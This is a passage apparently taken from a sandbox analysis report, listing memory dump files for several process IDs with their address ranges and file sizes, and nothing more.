
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      360KB

                                                                                                                                                                                                    • memory/14428-28145-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      360KB

                                                                                                                                                                                                    • memory/14428-28134-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      360KB

                                                                                                                                                                                                    • memory/14428-41473-0x0000000000300000-0x0000000000306000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      24KB

                                                                                                                                                                                                    • memory/14428-36218-0x0000000002AA0000-0x0000000002B69000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      804KB

                                                                                                                                                                                                    • memory/14428-36224-0x0000000003090000-0x0000000003199000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                    • memory/14428-28146-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      360KB

                                                                                                                                                                                                    • memory/14428-36221-0x0000000000330000-0x000000000034F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      124KB

                                                                                                                                                                                                    • memory/14428-36220-0x0000000002C10000-0x0000000002D3D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                    • memory/14428-36219-0x0000000002B70000-0x0000000002C0F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      636KB

                                                                                                                                                                                                    • memory/14532-22351-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      508KB

                                                                                                                                                                                                    • memory/14532-22361-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      508KB

                                                                                                                                                                                                    • memory/14532-22363-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      4KB

                                                                                                                                                                                                    • memory/14532-22364-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      508KB

                                                                                                                                                                                                    • memory/14532-22349-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      508KB

                                                                                                                                                                                                    • memory/14532-22359-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      508KB

                                                                                                                                                                                                    • memory/14532-22355-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      508KB

                                                                                                                                                                                                    • memory/14532-22357-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      508KB

                                                                                                                                                                                                    • memory/14532-22353-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      508KB

                                                                                                                                                                                                    • memory/27600-54288-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      244KB

                                                                                                                                                                                                    • memory/27600-54381-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      244KB